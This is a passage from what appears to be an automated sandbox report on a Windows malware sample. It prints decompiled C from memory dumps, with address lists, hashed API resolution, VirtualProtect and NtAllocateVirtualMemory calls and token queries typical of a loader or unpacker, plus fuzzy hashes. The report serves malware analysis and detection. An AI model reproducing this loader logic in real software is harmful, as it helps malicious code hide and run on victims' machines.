						_t274 = E6EF5306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						 *0x7EEC57E8 =  *((intOrPtr*)(0x7eec57e8)) + _t358;
						__eflags =  *0x6ef5d1f8 & _t358;
						 *(_t274 &  *_t274) =  *(_t274 &  *_t274) + (_t274 &  *_t274);
						 *0xf2377aa1 =  *0xf2377aa1 + _t358;
						__eflags =  *0xf2377aa1;
					}
					if( *((char*)(_t436 + 0x18)) != 0) {
						E6EF4BB44(_t436 + 0x14);
					}
					goto L12;
				} else {
					return _t164;
				}
			}

0x6ef5073f
0x6ef50741
0x6ef50748
0x6ef50fc7
0x6ef50fcd
0x6ef50fcd
0x6ef50752
0x6ef5075e
0x6ef5076a
0x6ef5076f
0x6ef5077c
0x6ef5078d
0x6ef5078f
0x6ef50790
0x6ef50791
0x6ef50791
0x6ef50792
0x6ef50796
0x6ef5079a
0x6ef5079f
0x6ef507a2
0x6ef507a8
0x6ef507c2
0x6ef507c9
0x6ef507cc
0x6ef507cf
0x6ef507d1
0x6ef507dd
0x6ef507ea
0x6ef507f7
0x6ef507fb
0x6ef50887
0x6ef50887
0x6ef5088d
0x6ef50898
0x6ef508b0
0x6ef508b1
0x6ef508b1
0x6ef508b1
0x6ef508b5
0x6ef508be
0x6ef508c3
0x6ef508c3
0x6ef508c5
0x6ef508d6
0x6ef508f8
0x6ef508fa
0x6ef508fb
0x6ef508ff
0x6ef508ff
0x6ef50908
0x6ef50914
0x6ef5091d
0x6ef50933
0x6ef50943
0x6ef50948
0x6ef5094c
0x6ef50951
0x6ef50953
0x6ef509a3
0x6ef509b8
0x6ef509bc
0x6ef509c1
0x6ef509d2
0x6ef509e7
0x6ef509eb
0x6ef509f0
0x6ef509f2
0x6ef50a39
0x6ef50a3c
0x6ef50a8a
0x6ef50a8d
0x6ef50ace
0x6ef50ad2
0x6ef50ad7
0x6ef50adc
0x6ef50afb
0x6ef50afb
0x6ef50afb
0x6ef50afd
0x00000000
0x6ef50afd
0x6ef50ade
0x6ef50ae2
0x6ef50ae4
0x6ef50aeb
0x6ef50aeb
0x6ef50af1
0x6ef50af1
0x6ef50af3
0x6ef50af6
0x6ef50af6
0x00000000
0x6ef50af3
0x6ef50ae6
0x6ef50ae9
0x6ef50aef
0x6ef50aef
0x00000000
0x6ef50aef
0x00000000
0x6ef50ae9
0x6ef50a8f
0x6ef50a92
0x00000000
0x00000000
0x6ef50a98
0x6ef50a9d
0x6ef50aa2
0x6ef50ac1
0x6ef50ac1
0x6ef50acb
0x00000000
0x6ef50acb
0x6ef50aa4
0x6ef50aa8
0x6ef50aaa
0x6ef50ab1
0x6ef50ab1
0x6ef50ab7
0x6ef50ab7
0x6ef50ab9
0x6ef50abc
0x6ef50abc
0x00000000
0x6ef50ab9
0x6ef50aac
0x6ef50aaf
0x6ef50ab5
0x6ef50ab5
0x00000000
0x6ef50ab5
0x00000000
0x6ef50aaf
0x6ef50a3e
0x6ef50a40
0x6ef50a7f
0x6ef50a82
0x6ef50df4
0x6ef50df9
0x6ef50dfe
0x6ef50e1d
0x6ef50e1d
0x6ef50e27
0x00000000
0x6ef50e27
0x6ef50e00
0x6ef50e04
0x6ef50e06
0x6ef50e0d
0x6ef50e0d
0x6ef50e13
0x6ef50e13
0x6ef50e15
0x6ef50e18
0x6ef50e18
0x00000000
0x6ef50e15
0x6ef50e08
0x6ef50e0b
0x6ef50e11
0x6ef50e11
0x00000000
0x6ef50e11
0x00000000
0x6ef50e0b
0x00000000
0x6ef50a88
0x6ef50a46
0x6ef50a4b
0x6ef50a50
0x6ef50a6f
0x6ef50a6f
0x6ef50a79
0x00000000
0x6ef50a79
0x6ef50a52
0x6ef50a56
0x6ef50a58
0x6ef50a5f
0x6ef50a5f
0x6ef50a65
0x6ef50a65
0x6ef50a67
0x6ef50a6a
0x6ef50a6a
0x00000000
0x6ef50a67
0x6ef50a5a
0x6ef50a5d
0x6ef50a63
0x6ef50a63
0x00000000
0x6ef50a63
0x00000000
0x6ef50a5d
0x6ef509f4
0x6ef509f6
0x00000000
0x00000000
0x6ef50a00
0x6ef50a05
0x6ef50a0a
0x6ef50a29
0x6ef50a29
0x6ef50a33
0x00000000
0x6ef50a33
0x6ef50a0c
0x6ef50a10
0x6ef50a12
0x6ef50a19
0x6ef50a19
0x6ef50a1f
0x6ef50a1f
0x6ef50a21
0x6ef50a24
0x6ef50a24
0x00000000
0x6ef50a21
0x6ef50a14
0x6ef50a17
0x6ef50a1d
0x6ef50a1d
0x00000000
0x6ef50a1d
0x00000000
0x6ef50a17
0x6ef50959
0x6ef5095e
0x6ef50963
0x6ef50982
0x6ef50982
0x6ef5098c
0x00000000
0x6ef5098c
0x6ef50965
0x6ef50969
0x6ef5096b
0x6ef50972
0x6ef50972
0x6ef50978
0x6ef50978
0x6ef5097a
0x6ef5097d
0x6ef5097d
0x00000000
0x6ef5097a
0x6ef5096d
0x6ef50970
0x6ef50976
0x6ef50976
0x00000000
0x6ef50976
0x00000000
0x6ef5089a
0x6ef5089c
0x6ef50b01
0x6ef50b06
0x6ef50b09
0x6ef50b0e
0x6ef50b10
0x6ef50b25
0x6ef50b28
0x6ef50bf6
0x6ef50bfe
0x6ef50c01
0x6ef50c16
0x6ef50c20
0x6ef50c20
0x6ef50c22
0x6ef50c24
0x6ef50c33
0x6ef50c3f
0x6ef50c43
0x6ef50c46
0x6ef50c49
0x6ef50c4c
0x00000000
0x6ef50c4c
0x6ef50b38
0x6ef50b4a
0x6ef50b4e
0x6ef50bda
0x6ef50bda
0x6ef50be0
0x6ef50beb
0x6ef50be2
0x6ef50be2
0x6ef50be2
0x00000000
0x6ef50be0
0x6ef50b5b
0x6ef50b5c
0x6ef50b5e
0x6ef50b64
0x6ef50fb3
0x6ef50fb8
0x6ef50fba
0x00000000
0x00000000
0x6ef50fc0
0x6ef50b7b
0x6ef50b7f
0x6ef50b84
0x6ef50b96
0x6ef50b9a
0x6ef50ba5
0x6ef50ba6
0x6ef50ba7
0x6ef50ba8
0x6ef50baa
0x6ef50bb5
0x6ef50e2d
0x6ef50e2d
0x6ef50bb5
0x6ef50bbb
0x6ef50bc4
0x6ef50e3f
0x6ef50e55
0x6ef50e57
0x6ef50e59
0x6ef50f94
0x6ef50f9b
0x00000000
0x6ef50f9b
0x6ef50e68
0x6ef50e76
0x6ef50e90
0x6ef50e92
0x6ef50e94
0x6ef50fa5
0x6ef50faa
0x6ef50fac
0x00000000
0x00000000
0x6ef50fae
0x6ef50ea8
0x6ef50eb3
0x6ef50ec2
0x6ef50ed4
0x6ef50ed6
0x6ef50ed8
0x6ef50ee5
0x6ef50ee5
0x6ef50ef5
0x6ef50f06
0x6ef50f0b
0x6ef50f0d
0x6ef50f0f
0x6ef50f16
0x6ef50f17
0x6ef50f17
0x6ef50f23
0x6ef50f44
0x6ef50f4d
0x6ef50f59
0x6ef50f65
0x6ef50f6a
0x6ef50f6f
0x6ef50f75
0x6ef50f75
0x6ef50f7a
0x6ef50f7c
0x6ef50f84
0x6ef50bca
0x6ef50bca
0x6ef50bcf
0x6ef50bd5
0x6ef50bd5
0x00000000
0x6ef50bcf
0x6ef50bc4
0x6ef50898
0x6ef50808
0x6ef50809
0x6ef5080b
0x6ef50811
0x6ef50dde
0x6ef50de3
0x6ef50de5
0x00000000
0x00000000
0x6ef50deb
0x6ef50828
0x6ef5082c
0x6ef50831
0x6ef50847
0x6ef5085e
0x6ef50862
0x6ef50c5a
0x6ef50c5a
0x6ef50862
0x6ef50868
0x6ef50871
0x6ef50c65
0x6ef50c69
0x6ef50c7a
0x6ef50c7e
0x6ef50c84
0x6ef50c86
0x6ef50c88
0x6ef50c88
0x6ef50c88
0x6ef5087c
0x6ef50882
0x6ef50882
0x00000000
0x6ef50c59
0x6ef50c59
0x6ef50c59

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6EF5085E
GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6EF50C20
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6EF50CB4

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: 8c813e4eb0cfa32cbc77c786bfe6941902b11e90d2841f0b8616a23e96c8be09
Instruction ID: 5fc1acd29cbb7c5908a72d7d40ef6cb9f9ffe94ce5b57b6f1071bf38695eba9a
Opcode Fuzzy Hash: 8c813e4eb0cfa32cbc77c786bfe6941902b11e90d2841f0b8616a23e96c8be09
Instruction Fuzzy Hash: EF22C571108341AFE760DBA4C870BDB77A9AFB231CF10881DA89887395EFB1D915CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6EF52234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6EF52234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6EF53AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6EF5306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6ef52234
0x6ef52238
0x6ef52254
0x6ef52257
0x6ef5223a
0x6ef52249
0x6ef5224c
0x6ef5224c
0x6ef52267
0x6ef5226c
0x6ef52270
0x6ef52278
0x6ef52278
0x6ef5227c

APIs

NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6EF44B17,00000000,00000000,?), ref: 6EF52278

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction ID: ff0a11a4977699a5849390ceaf54adae053ba9a13cdd19d628a0b75fb9704962
Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction Fuzzy Hash: 62E065B420E302AEF7449A6C9C24B6B36D8AFB5610F208E2DB468D7388E67194518761

Uniqueness

Uniqueness Score: -1.00%

Function 6EF52820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EF52820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6EF5306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6ef52827
0x6ef52830
0x6ef5283e
0x6ef52861
0x6ef52861
0x6ef52840
0x6ef52857
0x6ef5285b
0x00000000
0x6ef5285d
0x6ef5285d
0x6ef5285d
0x6ef5285b
0x6ef52866

APIs

NtAllocateVirtualMemory.NTDLL(6EF588E6,?,00000000,000000FF,6EF588E6,6EF588E6,60A28C5C,60A28C5C,?,?,6EF588E6,00003000,00000004,000000FF), ref: 6EF52857

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction ID: d93bc9963d28078a381e76fd9a6053b17a6eb0018630e713de700546edba21c0
Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction Fuzzy Hash: 9CE0157120A342AFFB08DB998C24E6BB6E9FFA4615F108D2EB49586250D721E9209721

Uniqueness

Uniqueness Score: -1.00%

Function 6EF53138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6EF53138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6EF534B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6ef53138
0x6ef5313d
0x6ef5313f
0x6ef53141

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6EF534B0,6EF53128,60A28C5C,60A28C5C,?,6EF46C99,00000000), ref: 6EF5313F

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: fc8defe6ffc94e45f5586e1447a6cae5fb8c4d92958bf104c9a26dd3e6e1c803
Instruction ID: 68efa2ec47f88ba4991fbfec0b6be754271f147fe38d41d763f11779c6196322
Opcode Fuzzy Hash: fc8defe6ffc94e45f5586e1447a6cae5fb8c4d92958bf104c9a26dd3e6e1c803
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0107212D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0107212D(long __ebx, void* __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				void* _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				signed int _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				char* _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t139;
				int _t145;
				int _t153;
				int _t157;
				intOrPtr _t168;
				int _t174;
				intOrPtr _t220;
				void* _t230;
				intOrPtr _t233;
				void* _t240;
				intOrPtr _t244;
				unsigned int _t247;
				intOrPtr _t256;
				DWORD* _t269;
				void* _t273;
				intOrPtr* _t276;
				intOrPtr* _t277;

				_t139 = _a4;
				_v20 = 0;
				_t240 =  *((intOrPtr*)(_t139 + 0x44));
				 *0x1074418 = 1;
				asm("movaps xmm0, [0x1073010]");
				asm("movups [0x1074428], xmm0");
				_v48 = _t139;
				_v52 =  *((intOrPtr*)(_t139 + 4));
				_v56 =  *((intOrPtr*)(_v48 + 0x14));
				_v184 = _t240;
				_v180 =  *((intOrPtr*)(_t139 + 0x38));
				_v176 = 4;
				_v172 =  &_v20;
				_v60 =  *((intOrPtr*)(_v48 + 0x58));
				_v64 = 4;
				_v68 = _t240;
				_v72 =  &_v20;
				_t145 = VirtualProtect(__edi, __ebx, __esi, _t269); // executed
				_v76 = _t145;
				_v184 = _v68;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x38));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E010719C7();
				E010720C1(_v68,  *((intOrPtr*)(_v48 + 0x3c)), _v56);
				E010719C7( *((intOrPtr*)(_v48 + 0x3c)), 0, _v56);
				_t153 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t276 = _t273 - 0x88;
				_t230 = _v68;
				_t256 =  *((intOrPtr*)(_t230 + 0x3c));
				_v96 = _t153;
				_v100 = _v68 + 0x3c;
				_v104 = _t230;
				_v108 = _t256;
				if(_t256 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v152 = _v104;
				if(_v60 == 0) {
					L2:
					 *_t276 = _v68;
					_v112 = _v68 +  *((intOrPtr*)(_v48 + 0x28));
					_t157 = DisableThreadLibraryCalls(??);
					_t277 = _t276 - 4;
					_t233 =  *_v100;
					_v116 = _t157;
					_v120 = _t233;
					_v124 = _v68;
					if(_t233 != 0) {
						_v124 = _v68 + (_v120 + 0x0000ffff & 0x0000ffff) + 1;
					}
					_t244 = _v48;
					_v44 =  *((intOrPtr*)(_t244 + 0x50));
					_v40 =  *((intOrPtr*)(_t244 + 0x40));
					_v36 =  *((intOrPtr*)(_t244 + 0x18));
					_v32 =  *((intOrPtr*)(_t244 + 0x10));
					_v28 =  *((intOrPtr*)(_t244 + 0x64));
					_v24 = _v112;
					 *_t277 = _t244;
					_v184 = 0;
					_v180 = 0x74;
					_v156 =  &_v44;
					_v160 = 0;
					_v164 = 0x74;
					_v168 =  *((intOrPtr*)(_v124 + 0x28));
					E010719C7();
					if(_v168 != 0) {
						_t276 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
				} else {
					_v132 = 0;
					_v128 = _v152 + 0x18 + ( *(_v152 + 0x14) & 0x0000ffff);
					while(1) {
						_t168 = _v128;
						_t247 =  *(_t168 + 0x24);
						_v136 = _t168;
						_v140 = _t247 >> 0x1f;
						_v184 = _v68 +  *((intOrPtr*)(_v136 + 0xc));
						_v180 =  *((intOrPtr*)(_v136 + 8));
						_v176 =  *((intOrPtr*)(0x1074418 + ((_t247 >> 0x0000001e & 0x00000001) << 4) + (_v140 << 3) + ((_t247 >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v144 = _v132;
						_t174 = VirtualProtect(??, ??, ??, ??); // executed
						_t276 = _t276 - 0x10;
						_t220 = _v144 + 1;
						_v148 = _t174;
						_v132 = _t220;
						_v128 = _v136 + 0x28;
						if(_t220 == _v60) {
							goto L2;
						}
					}
					goto L2;
				}
				return 1;
			}

0x01072139
0x01072147
0x0107214e
0x01072151
0x0107215b
0x01072162
0x0107216c
0x01072172
0x0107217b
0x01072184
0x01072187
0x0107218b
0x01072193
0x0107219a
0x0107219d
0x010721a0
0x010721a3
0x010721a6
0x010721c0
0x010721c6
0x010721c9
0x010721d1
0x010721d5
0x010721d8
0x010721db
0x010721de
0x010721e1
0x010721fd
0x0107221a
0x0107223f
0x01072241
0x0107224a
0x0107224d
0x01072257
0x0107225a
0x0107225d
0x01072260
0x01072263
0x0107247a
0x0107247a
0x0107236b
0x01072371
0x01072279
0x01072287
0x0107228f
0x01072292
0x01072294
0x0107229a
0x010722a6
0x010722a9
0x010722ac
0x010722af
0x010723e7
0x010723e7
0x010723fa
0x01072400
0x01072406
0x0107240c
0x01072412
0x01072418
0x0107241e
0x01072421
0x01072424
0x0107242c
0x01072434
0x0107243a
0x01072440
0x01072446
0x0107244c
0x0107245a
0x010723a6
0x010723ac
0x010723ac
0x01072377
0x010723c7
0x010723ca
0x010722ba
0x010722ba
0x010722c9
0x010722d1
0x010722dc
0x01072317
0x0107231a
0x0107231e
0x01072322
0x01072329
0x0107232f
0x01072331
0x0107233a
0x0107234b
0x01072351
0x01072354
0x01072357
0x00000000
0x00000000
0x0107235d
0x00000000
0x010722ba
0x01072392

APIs

VirtualProtect.KERNELBASE ref: 010721A6
VirtualProtect.KERNELBASE ref: 0107223F

Strings

t, xrefs: 0107242C

Memory Dump Source

Source File: 00000000.00000002.773825191.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: 8047caaf17aa622e321b48411ce0d08458af8470e0f5409791c1c4cf9dd9b280
Instruction ID: b48ab0541dd1d5d20e1ead45e635effb48961fbfa81a3d96f438a5d414a08f17
Opcode Fuzzy Hash: 8047caaf17aa622e321b48411ce0d08458af8470e0f5409791c1c4cf9dd9b280
Instruction Fuzzy Hash: B491AAB4E043188FDB04CFA8C580A9DBBF1BF88310F15856AE988AB351D334A981CF95

Uniqueness

Uniqueness Score: -1.00%

Function 010722BA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0107232F

Strings

t, xrefs: 0107242C

Memory Dump Source

Source File: 00000000.00000002.773825191.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: fb496b0c13105b57a5acd428e0d0532647af9c28f9f60c5264b7401294f9fb68
Instruction ID: 6c6b0f9d4c50a2ad0adcbb7bfcfbacecec55d6f39b08efc0f8a87fb20dc58e31
Opcode Fuzzy Hash: fb496b0c13105b57a5acd428e0d0532647af9c28f9f60c5264b7401294f9fb68
Instruction Fuzzy Hash: D7519EB5E003298FDB14CF59C980A9DFBF1BF48310F2681AAD958A7312D730A981CF95

Uniqueness

Uniqueness Score: -1.00%

Function 6EF50C7C, Relevance: 3.2, APIs: 2, Instructions: 193
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EF50C7C(signed int __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a52, void* _a56, void* _a248, void* _a276, void* _a288, void* _a292, void* _a296, void* _a300, void* _a304, void* _a308, void* _a312, void* _a320, void* _a328, void* _a336, void* _a344, void* _a348, void* _a356, void* _a360, void* _a368, void* _a404, void* _a412, void* _a416, void* _a420, void* _a424, void* _a428, void* _a464) {
				void* _v8;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v92;
				void* _v96;
				void* _t231;

				_t231 = __ebx;
				 *((intOrPtr*)(__ebx + 0xff685f0)) =  *((intOrPtr*)(__ebx + 0xff685f0)) + __ecx;
				 *(__eax &  *__eax) =  *(__eax &  *__eax) + (__eax &  *__eax);
				 *__edx =  *__edx + __ecx;
			}

0x6ef50c7c
0x6ef50c7e
0x6ef50c86
0x6ef50c88

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6EF50CB4

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: c9772d60a4b35e23032a84c6d4f731d38df05f6061382e0415bea67e519b0a1b
Instruction ID: f719f808296c7a46e123283097341a27311061b0db19c13c873ed56f8706a2fe
Opcode Fuzzy Hash: c9772d60a4b35e23032a84c6d4f731d38df05f6061382e0415bea67e519b0a1b
Instruction Fuzzy Hash: AC61F8716053419FE760CFA8C8B0BEB77A9AFB6308F44485DE8948B355EBB0D815CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6EF510A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6EF510A4(void* __ecx) {
				long _v12;
				void* _v20;
				void* _v24;
				long _v32;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v64;
				void* _v88;
				void* _v92;
				int _t33;
				signed char* _t35;
				intOrPtr* _t40;
				intOrPtr _t41;
				long* _t50;
				intOrPtr* _t59;
				intOrPtr* _t65;
				void* _t66;
				void* _t68;
				void* _t69;
				signed char* _t70;
				void* _t72;
				long* _t74;

				_t74 =  &_v32;
				_t69 = __ecx;
				_v12 = 0;
				_t59 = E6EF5306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t59 != 0) {
					 *_t59(_t69, 8,  &_v12);
				}
				_t50 = _t74;
				 *_t50 = _v12;
				_t50[1] = 1;
				if(E6EF4C280(_t50) != 0) {
					L6:
					if(_t74[1] != 0) {
						E6EF4BB44(_t74);
					}
					return 0;
				} else {
					_t74[6] = 0;
					if(E6EF5306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t74[6])); // executed
					}
					_t26 = _t74[6];
					if(_t74[6] != 0) {
						E6EF4F584( &_v32, _t26);
						_t68 = E6EF4F4BC( &(_t74[3]), 0);
						if(E6EF5306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
							L32:
							E6EF4F654( &_v32);
							goto L6;
						}
						_t33 = GetTokenInformation(_v40, 0x19, _t68, _t74[7],  &(_t74[6])); // executed
						if(_t33 == 0) {
							goto L32;
						}
						_t35 = E6EF5306C(0x150c05fc, 0x92f703d0, 0x150c05fc, 0x150c05fc);
						if(_t35 == 0) {
							goto L32;
						}
						_push( *_t68);
						asm("int3");
						asm("int3");
						_t70 = _t35;
						if(_t70 == 0) {
							goto L32;
						}
						_t65 = E6EF5306C(0x150c05fc, 0x18603352, 0x150c05fc, 0x150c05fc);
						if(_t65 == 0) {
							goto L32;
						}
						_t40 =  *_t65( *_t68, ( *_t70 & 0x000000ff) - 1);
						if(_t40 == 0) {
							goto L32;
						}
						_t41 =  *_t40;
						if(_t41 == 0) {
							_t72 = 1;
						} else {
							if(_t41 == 0x1000) {
								_t72 = 2;
							} else {
								if(_t41 == 0x2100) {
									_t72 = 4;
								} else {
									if(_t41 == 0x2000) {
										_t72 = 3;
									} else {
										if(_t41 == 0x3000) {
											_t72 = 5;
										} else {
											if(_t41 == 0x4000) {
												_t72 = 6;
											} else {
												_t66 = 7;
												_t72 =  ==  ? _t66 : 0;
											}
										}
									}
								}
							}
						}
						E6EF4F654( &_v48);
						if(_v52 != 0) {
							E6EF4BB44(_t74);
						}
						return _t72;
					}
					goto L6;
				}
			}

0x6ef510a6
0x6ef510b3
0x6ef510b5
0x6ef510c4
0x6ef510c8
0x6ef510d2
0x6ef510d2
0x6ef510d8
0x6ef510db
0x6ef510dd
0x6ef510e8
0x6ef51122
0x6ef51127
0x6ef5112c
0x6ef5112c
0x00000000
0x6ef510ea
0x6ef510f4
0x6ef51107
0x6ef51118
0x6ef51118
0x6ef5111a
0x6ef51120
0x6ef5113e
0x6ef5114e
0x6ef51165
0x6ef51247
0x6ef5124b
0x00000000
0x6ef5124b
0x6ef5117b
0x6ef5117f
0x00000000
0x00000000
0x6ef51191
0x6ef51198
0x00000000
0x00000000
0x6ef5119e
0x6ef511a0
0x6ef511a1
0x6ef511a2
0x6ef511a6
0x00000000
0x00000000
0x6ef511bd
0x6ef511c1
0x00000000
0x00000000
0x6ef511ce
0x6ef511d2
0x00000000
0x00000000
0x6ef511d4
0x6ef511d8
0x6ef51227
0x6ef511da
0x6ef511df
0x6ef51222
0x6ef511e1
0x6ef511e6
0x6ef5121d
0x6ef511e8
0x6ef511ed
0x6ef51218
0x6ef511ef
0x6ef511f4
0x6ef51213
0x6ef511f6
0x6ef511fb
0x6ef5120e
0x6ef511fd
0x6ef511ff
0x6ef51207
0x6ef51207
0x6ef511fb
0x6ef511f4
0x6ef511ed
0x6ef511e6
0x6ef511df
0x6ef5122c
0x6ef51236
0x6ef5123b
0x6ef5123b
0x00000000
0x6ef51240
0x00000000
0x6ef51120

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6EF51118
